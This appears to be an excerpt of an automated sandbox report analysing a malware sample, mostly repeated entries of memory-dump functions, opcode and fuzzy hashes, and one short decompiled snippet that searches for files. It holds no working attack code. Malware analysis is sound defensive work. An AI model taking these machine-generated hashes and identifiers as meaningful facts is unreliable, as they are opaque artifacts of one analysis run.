Function 032A06CC Relevance: 1.8, Strings: 1, Instructions: 520COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: d77111f7775a5dce99fcfc78a773d985765abc2602f35dc0249a7d1933fd2217
Instruction ID: 90573af19c28e01c3c1197e1b3fa01894fef2d52d4b1d117992054d8b0840b01
Opcode Fuzzy Hash: d77111f7775a5dce99fcfc78a773d985765abc2602f35dc0249a7d1933fd2217
Instruction Fuzzy Hash: 90D1FD43D3EF15CBE793B07885017A2A641DF23792F50CF678826B15A177AF4ACE0894

Uniqueness

Uniqueness Score: -1.00%

Function 032A06FE Relevance: 1.8, Strings: 1, Instructions: 508COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: d368b1c7013490b051eb9c2ce340095c79126df35fa1d0552915d49309f8e4a3
Instruction ID: a94afec3195092888c941b74c42ecd6c473f72ff944db5dfcb131b8e7b79505a
Opcode Fuzzy Hash: d368b1c7013490b051eb9c2ce340095c79126df35fa1d0552915d49309f8e4a3
Instruction Fuzzy Hash: C2D1ED43D3EB15CBE793A07885017A2A641DF23796F50CF6B8827B15A177AF4ACE0884

Uniqueness

Uniqueness Score: -1.00%

Function 032A0808 Relevance: 1.7, Strings: 1, Instructions: 496COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: fb9be6a4f8478d2fca517f00f6a1a94b0568ae4d36b14c6dcb1c254415a49afd
Instruction ID: 5023e8d32e14015c1367fad46deaa5b303679a161c3141e985b5ff6f0fa3e60d
Opcode Fuzzy Hash: fb9be6a4f8478d2fca517f00f6a1a94b0568ae4d36b14c6dcb1c254415a49afd
Instruction Fuzzy Hash: EFD1DC43D3EB15CBE793A07885117A2A681DF23396F50CF6B8826B15A1779F4ACE09C4

Uniqueness

Uniqueness Score: -1.00%

Function 032A08EF Relevance: 1.7, Strings: 1, Instructions: 476COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: 9b97146c35670104fac740149c9ee86cc3791f3521b30f80b1e2e075e647a3f2
Instruction ID: fbe3d1872f3f36ce32a6531acb5e7b025bf7f08525808d7f7ebcd255f6b69490
Opcode Fuzzy Hash: 9b97146c35670104fac740149c9ee86cc3791f3521b30f80b1e2e075e647a3f2
Instruction Fuzzy Hash: F6C1ED43D3EB15CBE793A0788141BE2A641DF237A6F50CF6B4C26B15A1779F4ACE0884

Uniqueness

Uniqueness Score: -1.00%

Function 032A09B8 Relevance: 1.7, Strings: 1, Instructions: 474COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: abd8a8ce1383db69a9e01b7cae9419714eb1c10141dfa8a41dbc081cf510542f
Instruction ID: 6d0273d343be2f6083edf3550ff0068d5649bb71814a9f9538f74d9bc2d73b51
Opcode Fuzzy Hash: abd8a8ce1383db69a9e01b7cae9419714eb1c10141dfa8a41dbc081cf510542f
Instruction Fuzzy Hash: 30C1DB43D3EB15CBE793A0788501BE2A641DF23766F50CF6B4C26B15A1779F4ACE0894

Uniqueness

Uniqueness Score: -1.00%

Function 032A087D Relevance: 1.7, Strings: 1, Instructions: 474COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: eb4851d047fd4b78d07fd5afbc3c2ef75d573fcb1f0bafa152200abb900826da
Instruction ID: b9dd11a987ce97b5dff63780a2361a9a999c35478ea61bf6dd034ea370c82938
Opcode Fuzzy Hash: eb4851d047fd4b78d07fd5afbc3c2ef75d573fcb1f0bafa152200abb900826da
Instruction Fuzzy Hash: 78C1DD43D3EF15CBE793A07881117A2A641DF237A6F50CF5B5C26B15A1779F4ACE0884

Uniqueness

Uniqueness Score: -1.00%

Function 032A08CF Relevance: 1.7, Strings: 1, Instructions: 449COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: 9f28963883acdadda09406e0efd874c8e5a3cfe133ad0af5ec9fb4698d743532
Instruction ID: 7a9f7385f05ac8023fd57bf2fc7f1d5d96ee26f75d194ea39e168f4fd8847038
Opcode Fuzzy Hash: 9f28963883acdadda09406e0efd874c8e5a3cfe133ad0af5ec9fb4698d743532
Instruction Fuzzy Hash: EFC1DC43D3EB15CBE793A0788501BE2A641DF237A6F50CF6B5C26B15A1779F4ACE0884

Uniqueness

Uniqueness Score: -1.00%

Function 032A092F Relevance: 1.7, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: 5f6469357a412db90f8819f45d1284cc25db8a7d8a8ae38903f732d292e51915
Instruction ID: 69a87212a6d8931acad8e8b29447ddbfa5aa24fd4d322963590518a4b1e9a7bf
Opcode Fuzzy Hash: 5f6469357a412db90f8819f45d1284cc25db8a7d8a8ae38903f732d292e51915
Instruction Fuzzy Hash: 92C1C943D3EB15CBE793A0788501BE2A641DF237A6F50CF6B4C26B15A1779F4ACE0884

Uniqueness

Uniqueness Score: -1.00%

Function 032A0976 Relevance: 1.7, Strings: 1, Instructions: 438COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: b73ca6dcaaf59f68ae69b99eebef3fe56a4095e11f4d9dca4e280e6d25705887
Instruction ID: 9ab498bfc7107150969469adb5ae220ba0e7f28c2eba95e0b6eb80484de9ce73
Opcode Fuzzy Hash: b73ca6dcaaf59f68ae69b99eebef3fe56a4095e11f4d9dca4e280e6d25705887
Instruction Fuzzy Hash: EEC1DB43D3EB15CBE793A0788101BA2A641DF23766F50CF6B4826B15A1779F4ACE0994

Uniqueness

Uniqueness Score: -1.00%

Function 032A09FF Relevance: 1.7, Strings: 1, Instructions: 433COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: 7cc21aff7edf4a146dac9cbb29f90b5321edaeb462dd2f22b42e72944d0bd02a
Instruction ID: 456564465342162985ad6b704d5f09896dfe7304a5705139de99ccdd16de49cd
Opcode Fuzzy Hash: 7cc21aff7edf4a146dac9cbb29f90b5321edaeb462dd2f22b42e72944d0bd02a
Instruction Fuzzy Hash: AAB1DB43D3EB15CBE793A0788541BE2A641DF233A6F50CF6B4C26B15A1779F4ACE0894

Uniqueness

Uniqueness Score: -1.00%

Function 032A0A6D Relevance: 1.7, Strings: 1, Instructions: 431COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: 235491b3167d1b24fbd7270458667b840af38a2bff19ac9f7e7345b882b03a76
Instruction ID: 472be4297fa23e1013cef7f25c0821bf94a6b35d8fcdeace27163fb7f14e58c3
Opcode Fuzzy Hash: 235491b3167d1b24fbd7270458667b840af38a2bff19ac9f7e7345b882b03a76
Instruction Fuzzy Hash: 5CB1DC43D3EB15CBE793A0788501BE26681DF23366F50CF6B5C26B15A1779F4ACE0894

Uniqueness

Uniqueness Score: -1.00%

Function 032A0AF3 Relevance: 1.7, Strings: 1, Instructions: 417COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: c7f0e149113bfbfd5a0899e755308364b97af349dccb32ad5b680212eabf1724
Instruction ID: 4bdad0ca30911215d0bea7a6df5be3840ed9d800cb209593f5e8af39dd71a5e7
Opcode Fuzzy Hash: c7f0e149113bfbfd5a0899e755308364b97af349dccb32ad5b680212eabf1724
Instruction Fuzzy Hash: A4A1DC43D3EB11CBE793A0788101BE26641DF23362F50CF6B4C26B19A1779F4ACE0894

Uniqueness

Uniqueness Score: -1.00%

Function 032A0B9B Relevance: 1.6, Strings: 1, Instructions: 374COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: 7565972b23f93d157c41b11f25a940198d0c033ace16f9e51022fccb24bf6618
Instruction ID: 5c17fd0a24c927f4c1221bac135fdde627ed8f68b91ff3a8b044692e2e4ccfed
Opcode Fuzzy Hash: 7565972b23f93d157c41b11f25a940198d0c033ace16f9e51022fccb24bf6618
Instruction Fuzzy Hash: 13A1FC43D3EF15CBE793A0788141BA2A641DF23762F40CF6B4C26B19A1779F5ACE0894

Uniqueness

Uniqueness Score: -1.00%

Function 032A0BD4 Relevance: 1.6, Strings: 1, Instructions: 372COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: c0e7a810b9893a0d2e0bca8e91ff7959d6e8789e2b30dbeab6b7d11da46325ba
Instruction ID: a2249d0a1c3cb10df29385285ed7e1db65779811471c60bd9e3071a20439c488
Opcode Fuzzy Hash: c0e7a810b9893a0d2e0bca8e91ff7959d6e8789e2b30dbeab6b7d11da46325ba
Instruction Fuzzy Hash: 3FA10D46D3EF15CBE793E0788040BA2A645DF23362F40CF6B4C26B18A1779F5ACE0894

Uniqueness

Uniqueness Score: -1.00%

Function 032A0CCD Relevance: 1.6, Strings: 1, Instructions: 353COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: cc65d950451264913d06103b523d8c359a8f8015dc37e780521d8944c85a98ce
Instruction ID: 3fefb1c2c2653bbe02dc754fe65671d75413acea086fbe46d404177573a48d33
Opcode Fuzzy Hash: cc65d950451264913d06103b523d8c359a8f8015dc37e780521d8944c85a98ce
Instruction Fuzzy Hash: 2591ED46D3EF15CBE793E0798141BA26645DF23762F40CF6B4C26B19A1739F19CE0894

Uniqueness

Uniqueness Score: -1.00%

Function 032A0E44 Relevance: 1.6, Strings: 1, Instructions: 339COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: 989b030dc4ecc9252f90102c4039456dbf2f01e81f87886ffd92cd6c2f49cbf0
Instruction ID: b6b4724fceb8e395b07000efe475f3a485b54c13c6a904827272b376a0769ce7
Opcode Fuzzy Hash: 989b030dc4ecc9252f90102c4039456dbf2f01e81f87886ffd92cd6c2f49cbf0
Instruction Fuzzy Hash: 49710F42D3EF11CBE793E07D80447A26645DF23762F408F6B8C26B1991739F4ACE0995

Uniqueness

Uniqueness Score: -1.00%

Function 032A0DA1 Relevance: 1.6, Strings: 1, Instructions: 330COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: 34d446d8eddc3490ea2135b02c2a7680d0ff782ecde298351bb299af87888905
Instruction ID: fb01baa58f3073b3ea5968161ca8d9b77a9210840218e492f350e2b64254c9fe
Opcode Fuzzy Hash: 34d446d8eddc3490ea2135b02c2a7680d0ff782ecde298351bb299af87888905
Instruction Fuzzy Hash: 0D81FC42D3EF11CBE793A07981407A26641DF23762F508F6B8C26B19A1739F4ACE0995

Uniqueness

Uniqueness Score: -1.00%

Function 032A0E8E Relevance: 1.6, Strings: 1, Instructions: 326COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: 402346edcb8f62ea1d916b590bb566b2a75d661543da8ce0d72b65a23a1009c3
Instruction ID: 97a9a08f0a809dec65b2480d7dab93968102810eeb80e506cce8807654370c31
Opcode Fuzzy Hash: 402346edcb8f62ea1d916b590bb566b2a75d661543da8ce0d72b65a23a1009c3
Instruction Fuzzy Hash: 9F81FC46D3AF16CBD783E07D84447A2A645DF27721F40CB6B4812F18A177EF49CE0991

Uniqueness

Uniqueness Score: -1.00%

Function 032A0DFB Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: 0e37ea7b0dd28e64f32f9324df3ec637ed3ee5cee7832a01d91cb1c9116ade6d
Instruction ID: 8552f2243b12de76cede2bbaccfdbf1f3c1f19c4aa17f5632a61915b2c3fc1bd
Opcode Fuzzy Hash: 0e37ea7b0dd28e64f32f9324df3ec637ed3ee5cee7832a01d91cb1c9116ade6d
Instruction Fuzzy Hash: 71810D42D3EF15CBE793A07D8040BA26645DF23762F40CF6B8C22B2991739F5ACE0995

Uniqueness

Uniqueness Score: -1.00%

Function 032A0DA5 Relevance: 1.6, Strings: 1, Instructions: 304COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: 3f9ecb8dd016fe232855ada1d36364043fb7e2b2de12c00e6b29dc8fce5d5938
Instruction ID: f3f81397fae065af80bd4c2397cf68b259ee23f50387f9676310f26834ff7aad
Opcode Fuzzy Hash: 3f9ecb8dd016fe232855ada1d36364043fb7e2b2de12c00e6b29dc8fce5d5938
Instruction Fuzzy Hash: 5981FC42D3EF11CBE793A07D81507A26641DF23762F40CF6B4C26B19A1739F4ACE0995

Uniqueness

Uniqueness Score: -1.00%

Function 032A0EC6 Relevance: 1.5, Strings: 1, Instructions: 299COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: 278f7fb163afdee7d75ec7bf907f636c210e6cc4d014a03ddf2fdbaf53c0f483
Instruction ID: 5e493fa293ca2aa07f54594a46b50e3905bdefe4a8111a1f66e4a94c6142f2e0
Opcode Fuzzy Hash: 278f7fb163afdee7d75ec7bf907f636c210e6cc4d014a03ddf2fdbaf53c0f483
Instruction Fuzzy Hash: 3971FC42D3EF12CBE793E07D80507A26645DF23762F508F6B8C12B2991B39F5ACE0995

Uniqueness

Uniqueness Score: -1.00%

Function 032A0F0D Relevance: 1.5, Strings: 1, Instructions: 296COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: f4dfd7f76d979dcbcc31b68e722b451e1ace0db06e72ee755dfc3e41c4899a6c
Instruction ID: 1d64ff2bcc3bb56f26e564805e16c9ab8c5e5c8e58853b4c7f48427374274135
Opcode Fuzzy Hash: f4dfd7f76d979dcbcc31b68e722b451e1ace0db06e72ee755dfc3e41c4899a6c
Instruction Fuzzy Hash: 0571EB42E3EF12CBE793E07D80547B26645DF23762F408B6B8C16B1991B39F5ACE0991

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E00406668();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x00402923
0x0040293e
0x00402949
0x0040294a
0x00402a94
0x00402925
0x00402928
0x0040292b
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 1358fc4729cd4e161e3f995057c9de5906a44dd4f8dff08d490623953bdc3ea8
Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
Opcode Fuzzy Hash: 1358fc4729cd4e161e3f995057c9de5906a44dd4f8dff08d490623953bdc3ea8
Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29

Uniqueness

Uniqueness Score: -1.00%

Function 032A1150 Relevance: 1.5, Strings: 1, Instructions: 272COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: 503433788421fc5e98c5473dfdf5225f36600c5723d1a6d47081526874109ab8
Instruction ID: 3da07a382255607eba63ede645235bb9070347bbc419b6e15aa90542ae4afad8
Opcode Fuzzy Hash: 503433788421fc5e98c5473dfdf5225f36600c5723d1a6d47081526874109ab8
Instruction Fuzzy Hash: EF61145993AF09C7D682FE6C40517A31E06CF12F71FC04AFF8A0373542639A65EE4859

Uniqueness

Uniqueness Score: -1.00%

Function 032A0FAB Relevance: 1.5, Strings: 1, Instructions: 270COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: db0f72e958cff80005d1b564e5e38c4e5ef70346e20af1fe00270cd12d8ac422
Instruction ID: 633cac9e7701ea72fc37dceb44f7409a009e14ca2bb46abecf0b73f2dd11c2c6
Opcode Fuzzy Hash: db0f72e958cff80005d1b564e5e38c4e5ef70346e20af1fe00270cd12d8ac422
Instruction Fuzzy Hash: 13610B02D3EB02CBE793E07D80407A26645DF23762F508F6B8C17B2991B39F59CE0991

Uniqueness

Uniqueness Score: -1.00%

Function 032A0F67 Relevance: 1.5, Strings: 1, Instructions: 259COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: c4c211f822c91dedc73d6b8990792d0b384202fbba7616f0b54da758aae84087
Instruction ID: 8f24a581e1d9ca052c5155dcc4385681c9a1226401e24e3d5d9984bc0bfbbb08
Opcode Fuzzy Hash: c4c211f822c91dedc73d6b8990792d0b384202fbba7616f0b54da758aae84087
Instruction Fuzzy Hash: DA61DC42E3EF12CBE793E07D80507A266459F23762F508F6B8817B1991B39F5ACE0991

Uniqueness

Uniqueness Score: -1.00%

Function 032B2E91 Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

XN, xrefs: 032B3332

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: XN
API String ID: 0-427520816
Opcode ID: 35c2beca127f3c0bb269ffebc0e87b6efb40ccd029814cf1d60038c711ffd61c
Instruction ID: 03fceefa78da28a77120fa1875deb751450a2ab9413d61655ea83a985a16ae08
Opcode Fuzzy Hash: 35c2beca127f3c0bb269ffebc0e87b6efb40ccd029814cf1d60038c711ffd61c
Instruction Fuzzy Hash: 3FB191215183C68ADB22DF388C987DABBA26F133A0F4DC2A9CDD99F1D6D3744185C752

Uniqueness

Uniqueness Score: -1.00%

Function 032AA469 Relevance: 1.5, Strings: 1, Instructions: 248COMMON

Download Yara Rule

Strings

Zt&R, xrefs: 032AA5B6

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: Zt&R
API String ID: 0-2427929514
Opcode ID: 62e3644ee1803cbaf12524c0c735d1e7a4b4eb69b6f5b79d754a1ff9d3365a9d
Instruction ID: ed5856f57927879050d65964c64d884d0045e51bada409d98acf7038156349ce
Opcode Fuzzy Hash: 62e3644ee1803cbaf12524c0c735d1e7a4b4eb69b6f5b79d754a1ff9d3365a9d
Instruction Fuzzy Hash: 4CB100706047898FEB78CF28C9947EA77B2EF96350F59816ECC498B606D3709982CF45

Uniqueness

Uniqueness Score: -1.00%

Function 032A1067 Relevance: 1.5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: a57ff791fdc878fd2c13a80472f9eadac35ef1bc474b03764b7b6e2790f3e77a
Instruction ID: 4a537a49515abf5af3e8b92a1245b5a80192942f407c2143cd7365b0f50ed182
Opcode Fuzzy Hash: a57ff791fdc878fd2c13a80472f9eadac35ef1bc474b03764b7b6e2790f3e77a
Instruction Fuzzy Hash: 0F51FE02D3EF16CBE693D07D84507B22649DF23B62F908B6B8C17B2551B39B59CE09A1

Uniqueness

Uniqueness Score: -1.00%

Function 032A10E8 Relevance: 1.5, Strings: 1, Instructions: 243COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_32a0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: db94799853e20b0ba44639905bc9cf0258d19f082672e4c2be5031d0677a947b
Instruction ID: 1089aac6203cf8416b4c2187bb7c11fa6300375bd62762b875d93a8e390312c1
Opcode Fuzzy Hash: db94799853e20b0ba44639905bc9cf0258d19f082672e4c2be5031d0677a947b
Instruction Fuzzy Hash: B2510002D3EF16CBD693D47D40907B22659DF23762F908F5B4C13B2950A39B59CE4DA1

Uniqueness

Uniqueness Score: -1.00%

Function 032A0FFB Relevance: 1.5, Strings: 1, Instructions: 242COMMON

Download Yara Rule

Strings

m, xrefs: 032A12F7

Memory Dump Source

Source File: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

